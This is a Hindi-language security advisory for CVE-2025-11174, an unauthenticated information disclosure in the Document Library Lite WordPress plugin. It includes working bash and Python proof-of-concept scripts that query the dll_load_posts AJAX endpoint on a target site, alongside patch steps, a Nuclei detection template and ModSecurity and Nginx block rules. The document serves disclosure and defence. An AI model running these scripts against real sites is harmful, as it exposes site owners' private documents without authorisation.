
Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174
कीवर्ड: CVE-2025-11174, Document Library Lite कमजोरी, सूचना प्रकटीकरण, WordPress सुरक्षा, बिना प्रमाणीकरण का AJAX शोषण, WordPress प्लगइन कमजोरी, CWE-862, WordPress दस्तावेज़ प्लगइन सुरक्षा, प्राधिकरण बाईपास, WordPress CVE 2025
Document Library Lite WordPress प्लगइन सूचना प्रकटीकरण कमजोरी (CVE-2025-11174) – सुरक्षा दोष जो WordPress दस्तावेज़ लाइब्रेरी प्लगइन में संवेदनशील दस्तावेज़ डेटा तक बिना प्रमाणीकरण के पहुंच की अनुमति देता है।
एक महत्वपूर्ण प्राधिकरण बाईपास कमजोरी Document Library Lite WordPress प्लगइन में खोजी गई है, जो बिना प्रमाणीकरण के हमलावरों को संवेदनशील दस्तावेज़ जानकारी तक पहुंचने की अनुमति देती है।
खोजकर्ता: Kai Aizen और Avraham Shemesh (SnailSploit)
प्रकाशित: 1 नवंबर 2025
CVSS स्कोर: 5.3 (मध्यम)
CWE: CWE-862 – अनुपस्थित प्राधिकरण
प्लगइन: Document Library Lite
विक्रेता: Barn2 Plugins
हमले का प्रकार: बिना प्रमाणीकरण के सूचना प्रकटीकरण
आवश्यक विशेषाधिकार: कोई नहीं (बिना प्रमाणीकरण का हमला)
Document Library Lite प्लगइन (WordPress के लिए) में सभी संस्करणों तक 1.1.6 तक एक अनुचित प्राधिकरण कमजोरी है। प्लगइन एक बिना प्रमाणीकरण के AJAX एक्शन dll_load_posts को उजागर करता है जो बिना nonce या क्षमता जांच के दस्तावेज़ डेटा की JSON तालिका लौटाता है।
यह कमजोरी बिना प्रमाणीकरण के हमलावरों को इसकी अनुमति देती है:
नोट: 5.3 का CVSS स्कोर (मध्यम गंभीरता) सीमित सूचना प्रकटीकरण को दर्शाता है। जबकि कमजोरी दस्तावेज़ डेटा तक बिना प्रमाणीकरण के पहुंच की अनुमति देती है, गोपनीयता पर प्रभाव को निम्न (Low) के रूप में रेट किया गया है, जिसका अखंडता या उपलब्धता पर कोई प्रभाव नहीं है।
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS v3.1 विवरण:
AJAX एक्शन dll_load_posts उचित प्रमाणीकरण या प्राधिकरण जांच के बिना पंजीकृत है:
// कमजोर कोड पैटर्न (सरलीकृत)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
wp_ajax_nopriv_ उपसर्ग इंगित करता है कि यह एक्शन बिना प्रमाणीकरण वाले उपयोगकर्ताओं के लिए सुलभ है, और कॉलबैक फ़ंक्शन इन्हें लागू नहीं करता है:
POST /wp-admin/admin-ajax.php
action=dll_load_posts
कमजोरी का शोषण बिना प्रमाणीकरण के WordPress के admin-ajax.php एंडपॉइंट के माध्यम से किया जा सकता है।
⚠️ केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए
#!/bin/bash
# CVE-2025-11174 PoC
TARGET_URL="$1"
if [ -z "$TARGET_URL" ]; then
echo "उपयोग: $0 <लक्ष्य_url>"
echo "उदाहरण: $0 https://example.com"
exit 1
fi
echo "[*] CVE-2025-11174 - Document Library Lite सूचना प्रकटीकरण PoC"
echo "[*] लक्ष्य: $TARGET_URL"
echo ""
# कमजोर AJAX एंडपॉइंट पर अनुरोध भेजें
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=dll_load_posts" \
| python3 -m json.tool
echo ""
echo "[+] यदि आप ऊपर दस्तावेज़ डेटा देखते हैं, तो साइट कमजोर है!"
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite सूचना प्रकटीकरण PoC
केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए
"""
import requests
import sys
import json
def exploit(target_url):
ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
print(f"[*] लक्ष्य: {target_url}")
print(f"[*] AJAX एंडपॉइंट: {ajax_url}\n")
data = {'action': 'dll_load_posts'}
try:
response = requests.post(ajax_url, data=data, timeout=10)
if response.status_code == 200:
print("[+] अनुरोध सफल!\n")
try:
json_data = response.json()
print("[+] प्राप्त दस्तावेज़ डेटा:")
print(json.dumps(json_data, indent=2))
print("\n[!] साइट CVE-2025-11174 के लिए कमजोर है")
except json.JSONDecodeError:
print("[-] कोई JSON प्रतिक्रिया प्राप्त नहीं हुई")
print(f"प्रतिक्रिया: {response.text[:200]}")
else:
print(f"[-] अनुरोध स्थिति कोड के साथ विफल: {response.status_code}")
except requests.RequestException as e:
print(f"[-] त्रुटि: {e}")
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"उपयोग: {sys.argv[0]} <लक्ष्य_url>")
print(f"उदाहरण: {sys.argv[0]} https://example.com")
sys.exit(1)
target = sys.argv[1]
exploit(target)
तत्काल कार्रवाई आवश्यक:
action=dll_load_posts के साथ admin-ajax.php पर संदिग्ध POST अनुरोधों के लिए अपनी साइट के एक्सेस लॉग की समीक्षा करेंWordPress प्रशासन के माध्यम से:
WP-CLI का उपयोग करके:
wp plugin update document-library-lite
सुनिश्चित करें कि सभी AJAX हैंडलर उचित सुरक्षा नियंत्रण लागू करें:
// उचित AJAX सुरक्षा का उदाहरण
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');
function dll_load_posts_callback() {
// Nonce सत्यापित करें
if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
wp_die('अमान्य nonce');
}
// क्षमताओं की जांच करें
if (!current_user_can('read')) {
wp_send_json_error('अपर्याप्त अनुमतियाँ');
wp_die();
}
// आपका सुरक्षित कोड यहाँ
}
# जांचें कि कमजोर संस्करण स्थापित है या नहीं
wp plugin list | grep -i "document-library-lite"
न्यूक्लियाई टेम्पलेट:
id: CVE-2025-11174
info:
name: Document Library Lite - बिना प्रमाणीकरण के सूचना प्रकटीकरण
author: security-research
severity: medium
description: WordPress के लिए Document Library Lite प्लगइन सूचना प्रकटीकरण के लिए कमजोर है
reference:
- https://github.com/[your-repo]/CVE-2025-11174
tags: cve,cve2025,wordpress,wp-plugin,unauth
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php"
body: "action=dll_load_posts"
matchers-condition: and
matchers:
- type: word
words:
- "data"
- "recordsTotal"
condition: and
- type: status
status:
- 200
ModSecurity नियम:
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
"chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
log,deny,status:403,msg:'CVE-2025-11174 शोषण प्रयास'"
SecRule ARGS:action "@streq dll_load_posts" "t:none"
Nginx/OpenResty नियम:
if ($request_uri ~* "admin-ajax\.php") {
if ($args ~* "action=dll_load_posts") {
return 403;
}
}
शोधकर्ता:
प्रकटीकरण प्रक्रिया: समन्वित प्रकटीकरण
यह जानकारी केवल सुरक्षा अनुसंधान और रक्षात्मक उद्देश्यों के लिए प्रदान की गई है। इस कमजोरी का दुर्भावनापूर्ण उद्देश्यों के लिए कोई भी शोषण अवैध और अनैतिक है। उन प्रणालियों का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें जिनके आप मालिक नहीं हैं।
इस कमजोरी के बारे में प्रश्नों या अतिरिक्त जानकारी के लिए:
अंतिम अद्यतन: 2 नवंबर 2025
इस परियोजना का पूरा लेख, कार्यप्रणाली और संबंधित शोध यहां रहता है:
https://snailsploit.com/security-research/cves/cve-2025-11174/
Kai Aizen द्वारा निर्मित — स्वतंत्र आक्रामक सुरक्षा शोधकर्ता।
snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter
वही हमला। अलग सब्सट्रेट।
| मीट्रिक | मान |
|---|
| हमला वेक्टर | नेटवर्क (AV:N) |
| हमला जटिलता | निम्न (AC:L) |
| आवश्यक विशेषाधिकार | कोई नहीं (PR:N) |
| उपयोगकर्ता सहभागिता | कोई नहीं (UI:N) |
| दायरा | अपरिवर्तित (S:U) |
| गोपनीयता | निम्न (C:L) |
| अखंडता | कोई नहीं (I:N) |
| उपलब्धता | कोई नहीं (A:N) |